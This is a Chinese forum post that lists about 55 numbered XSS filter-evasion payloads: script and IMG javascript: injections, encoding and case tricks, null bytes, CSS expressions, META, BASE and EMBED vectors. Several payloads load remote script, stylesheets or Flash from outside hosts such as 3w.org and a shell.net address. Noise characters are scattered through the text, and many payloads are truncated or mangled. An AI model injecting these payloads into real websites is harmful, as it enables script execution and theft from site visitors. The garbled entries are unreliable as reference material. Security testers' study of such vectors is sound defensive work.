(1)普通的XSS JavaScript注入
2 \" l9 C. Q% [% \; L% f8 t4 r3 W<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
4 c: ^! s, T0 L. c# j" r7 r% g+ B(99)另类弹框, g# \% s5 s9 X0 \; j& U3 `" k
<q/oncut=alert()>1# c+ n. B" O/ Y& |: H( K7 ^ t
<s/onclick=alert()>b
$ ?3 i( Z; v0 b* c7 f6 k; _ <XSS=" onclick="alert(1)//">clickme</SSX=">2 s# T# F- t$ w
<zzz onclick=alert`1`>clickme</zzz> / k7 r& s H) C3 ~- w" ]
<a onclick=alert`1`>clickme</a>/ b) W7 Q, t, V5 O: O/ ?9 L
<a=">clickme</a=">* ~5 Z5 O4 p, X/ _- ]
<a=">clickme</a>
( M$ _# \7 H) W$ I" j3 @<z=">clickme</z=">
+ ]1 L- x( c; x- A" r" _<z onclick=alert`1`>clickme</z>
7 D4 c Q# v5 |8 I& Q9 L
/ b; r# t( Y- R$ H. L& D1 [(2)IMG标签XSS使用JavaScript命令- I' p, i6 B$ Z5 _
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>7 K |1 H9 d% x7 G
- u$ y% l, z, f* |/ S% P
(3)IMG标签无分号无引号
. P( T& K& |3 D. V% G8 }<IMG SRC=javascript:alert(‘XSS’)>) W( i2 u1 J# q! ?
5 Y2 j" ]- E3 D/ s3 G( b' p
(4)IMG标签大小写不敏感
- P& U7 B! ?5 k4 X, e<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
! t5 |& Z5 d! P: E6 a, Q6 e+ U
! W* K9 \. ~8 P' k h0 Z0 x(5)HTML编码(必须有分号)
2 y6 a& G `# w1 s<IMG SRC=javascript:alert(“XSS”)>+ l4 W* d. m5 |+ b
R7 T- s1 g8 h e
(6)修正缺陷IMG标签( v+ Q7 U Z8 \2 L
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>+ a$ z) ?- ~ d4 E. |2 y
5 r( C p7 p; v(7)formCharCode标签(计算器)5 g5 F! S0 @8 D& ^8 Y+ Q) [
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>$ r) l- R" ?# }9 G
% @" c& s5 K$ U( K" I0 h: C
(8)UTF-8的Unicode编码(计算器)" Q/ J3 V4 T5 B. y' o
<IMG SRC=jav..省略..S')>
7 x- L) Y$ k% O- S) @% s8 p0 s
7 g X; I9 k' ~6 v(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
1 a' D5 R9 K: [1 r. j+ v4 L<IMG SRC=jav..省略..S')>
+ k3 {2 Y) P. ^1 P, D, [, E: i; I/ U9 u% |9 F ~' D) E* f
(10)十六进制编码也是没有分号(计算器). W3 S( @# H2 {& Y
<IMG SRC=\'#\'" /span>
* w$ A7 B: M. [4 j4 t E# m$ i& N, o. n4 l
(11)嵌入式标签,将Javascript分开% ?. {) x2 h* v; R# U4 [
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>, P* H2 x- s- v
: f; f0 H8 _, P(12)嵌入式编码标签,将Javascript分开
5 ~; v, j0 E, ]# m<IMG SRC=\'#\'" ascript:alert(‘XSS’);”># n" g: ~" \2 [" p0 q5 N1 n
d, X, |$ m f5 W" v6 U) j/ x(13)嵌入式换行符
, o' }' ^" R( |/ l: i7 d' C<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
' K; G9 H# L1 ~' C+ P( k: w" q* b% Z" }. j5 ^& q/ n& P! c$ s U# M
(14)嵌入式回车
% \) l, V$ s$ M/ b9 Q U<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>+ D9 f. y u1 j- G) c, _
6 Y( j$ b; W6 H. j6 G7 ^: Z
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
2 `0 a3 t5 x$ b0 m, C<IMG SRC=\'#\'" /span>' z t! t8 W; h
' H Z( X* A( Q4 ?5 b! ^
(16)解决限制字符(要求同页面)/ _& C/ J/ w: \% E% A4 j- o
<script>z=’document.’</script>
' {% t6 y9 G3 ]1 w R) s<script>z=z+’write(“‘</script>2 L% h G. J1 j: H: m
<script>z=z+’<script’</script>0 V o d. Q# s; H/ D$ a: d
<script>z=z+’ src=ht’</script>
+ H7 R) D; N x- c! g5 q/ Q& k<script>z=z+’tp://ww’</script> I/ G, w. ?) X
<script>z=z+’w.shell’</script>
* G0 w2 p) y. U' d$ H( K<script>z=z+’.net/1.’</script># a; j. w6 L" q7 E
<script>z=z+’js></sc’</script>
% K5 G. k4 p7 c. a<script>z=z+’ript>”)’</script>
2 |3 Y( e% t# s8 ], A<script>eval_r(z)</script>
i( W2 b& o; y& K) [
; Z. g8 Z: p2 l' y1 ~(17)空字符6 G2 e* o6 T/ u8 _: L @* P
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out6 j% Z. n7 {6 E h2 r
! |) g+ `5 }6 M" A6 ~(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用) @0 ^5 L5 D8 z5 }5 N' S* L
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out6 v5 ]' q+ b V" U2 [
- _, U( x, M; n& ^9 \8 L; B, k/ Q i* z
(19)Spaces和meta前的IMG标签
[0 F& [, m, l9 w+ M<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>
7 d8 \. i" ?4 O% ~+ I3 O! U7 H8 ~: C& M6 x3 H4 X5 i, f
(20)Non-alpha-non-digit XSS
+ \6 r+ B& @2 x1 a5 V1 I2 G3 P$ k o<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
0 h1 s" ]% L6 O0 P2 I+ N# V, U
, U: S* A8 z2 l$ s(21)Non-alpha-non-digit XSS to 2, ]" _2 c7 |3 h
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>9 ?1 X! h9 J+ S! w" Z
( ^- e3 O* l5 u L; v! e(22)Non-alpha-non-digit XSS to 3
6 }# l! B0 m' M+ I, M<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
6 }: q% a9 `9 l5 V! n# u7 |5 \
5 v5 i- L4 {/ B) O0 N$ F(23)双开括号% q- I) U3 M1 A& V( Q% |; Y, u# Z% P
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
: u5 W7 W7 S6 J- s0 z, o" L `& [! l1 q1 x/ I
(24)无结束脚本标记(仅火狐等浏览器)# [- B% s4 j$ s( Y: I2 }+ H
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
) X" y# _% U2 d8 i* z1 N8 I; U. i$ T e3 k7 ~+ Y
(25)无结束脚本标记2+ C4 [8 d# U$ O t# e
<SCRIPT SRC=//3w.org/XSS/xss.js>
" b* R8 h) y2 }8 z" l I
: _* |6 C, ~+ D/ O1 Z# {(26)半开的HTML/JavaScript XSS
' k$ |) ?& ~& u3 R3 l) I4 w! i<IMG SRC=\'#\'" /span>
# n* y6 j7 m a/ ^# f
* h0 ?4 c g9 u- Y9 I3 \3 n% M& n0 V* O(27)双开角括号
4 l0 V# J( U: ~% Q8 i8 l$ o<iframe src=http://3w.org/XSS.html <! g$ n$ |0 [8 D' g
* Y3 w2 A7 Q- U; e" W$ _3 a+ h
(28)无单引号 双引号 分号
2 ^ u, J, k; K2 Q<SCRIPT>a=/XSS/
! g) p5 d- B- L& H! N; l. Jalert(a.source)</SCRIPT>
& f7 F% j$ w5 l3 E5 ~
! V) O" Z4 x4 H q/ K9 O. |- b! [(29)换码过滤的JavaScript
1 ~; h1 C1 d" m+ n( |3 }; ~\”;alert(‘XSS’);//
7 d' l9 ^( [$ n8 G% J2 Q. A
. d# C; }6 t0 i& ^(30)结束Title标签
3 d- o2 d3 T/ o1 T</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
1 i" q1 \ N9 l
. I2 E0 i8 ~6 U1 T" v) C+ |5 a(31)Input Image l! u' O4 Q$ G3 u2 H0 \5 A# j& U8 @
<INPUT SRC=\'#\'" /span>- \# t2 P* H& @; R+ v$ p5 h" |+ V
& p5 b: w( r2 w' P4 r. I(32)BODY Image
+ f2 W/ b; q8 r) M8 h2 j2 h" W8 x<BODY BACKGROUND=”javascript:alert(‘XSS’)”>: t& w! P+ F- Y. I' P# `
& i2 v$ f& F0 o% f(33)BODY标签
1 G3 L1 @9 x6 L<BODY(‘XSS’)>
$ u# I* g7 ?7 D' H$ T1 W
- u- T/ t% m c- r(34)IMG Dynsrc
, t E" C r2 ~/ @<IMG DYNSRC=\'#\'" /span>8 g! V# A7 ^4 H8 M+ m
( \5 ~+ @" z2 P0 _$ C- J5 O
(35)IMG Lowsrc
3 x" z" m5 S- _7 z6 e7 J1 b; Z<IMG LOWSRC=\'#\'" /span>
9 o6 Q; v% k7 W1 O3 B" P6 E6 M5 T0 [& U
(36)BGSOUND
* m# {3 B+ {, ~! T; q<BGSOUND SRC=\'#\'" /span>
0 w+ O7 l5 G1 c$ |. |; A2 K
/ C* `0 J, `! h9 ^' G(37)STYLE sheet- t* I; y& \+ Z+ q
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
* y; L- S. ^, |7 x# ?" Y- `: o; c/ Q& Z3 O
(38)远程样式表' ]7 C5 |* t4 F4 D- v
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>4 z3 S) r- k, J" b5 Q
) ]& w' }) d3 e8 B5 G$ N
(39)List-style-image(列表式)
; A$ s' z; Y% L8 M' W& f/ G8 [<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS' i: ]1 Y7 q) {
. h3 E j3 W( a0 ?: a: V
(40)IMG VBscript
1 j! M& h! F; r. x z8 o7 j& f# {<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
9 D( t4 i8 D3 U, n! B
# o9 w D! E: Y+ n+ I+ k(41)META链接url
! _% a0 c7 o: h0 |% R<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>8 K& y* t& Z9 }& E/ }( w3 O
6 e, l+ h- M6 i. D
(42)Iframe
0 C! i3 G" z+ g1 `) {<IFRAME SRC=\'#\'" /IFRAME>. y/ I; S) t* B9 v# M6 p
0 `7 O: F% L7 M! A6 Y5 x(43)Frame1 ~8 S1 r1 v C9 g
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>; B7 r5 E9 X4 J @$ g
8 a7 k# Y' u$ F8 R+ b7 v$ x h! d(44)Table+ V! J9 N: d, f+ G9 K* y0 M
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
& W% S. W; E8 t4 t. ?
( ]: I; ?- n* L j; m& P(45)TD) U$ J/ T U7 @8 h: D
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
3 H; \# v% F, o+ y% N+ d
; \/ c) H+ T# m' K(46)DIV background-image2 C4 F1 W& L1 l6 ? G( D t& O
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>0 X3 G! P/ G6 C1 j$ P
- V+ p8 N) ^, W4 s f9 ?(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)" ] o1 U& s& H; ~6 M
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
( F" O0 Q9 o% q' w7 w( K2 ?& G. N- C: S% m
(48)DIV expression
/ N" r1 g/ ^ \+ I<DIV STYLE=”width: expression_r(alert(‘XSS’));”> j7 y7 w& p2 Y
" T* H. J+ I _. M1 L
(49)STYLE属性分拆表达
, C+ M7 | K- M' I' L$ Y<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
+ M2 g6 ?" p# d- L) K& w
1 l8 N- [* K" Q. U(50)匿名STYLE(组成:开角号和一个字母开头)
7 Q; {9 R5 T: D<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
# |0 g1 q1 N) b2 A/ J% |* W I: a' L0 v2 i: o
(51)STYLE background-image
# o' v- C0 y! j6 R1 f<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>5 e" @; ^# G" ?" I$ h$ b8 M0 o
8 |6 L! f9 Y4 B* ^(52)IMG STYLE方式' f- s' A, B, P- j/ o
exppression(alert(“XSS”))’>
2 i2 `1 { X9 i4 ]2 T5 _$ B+ o. |9 a) t1 w/ o: g
(53)STYLE background
3 N( x+ V6 }& H" s, |<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>5 i8 @0 p! M; \, D. C; r4 O, ^* R4 _
: M: ~) j+ l9 M1 v% E4 Y(54)BASE4 j% V, Y$ E2 C) Q( g9 F8 c6 h
<BASE HREF=”javascript:alert(‘XSS’);//”>
4 I+ j% Y/ R7 i6 R- G+ x
' I4 ?5 [, w/ O4 ~(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
$ @" u4 m7 X' Y% H+ c<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
8 o) L# C: U/ C9 i |
发表于 2016-4-28 10:06:15
收藏
支持
反对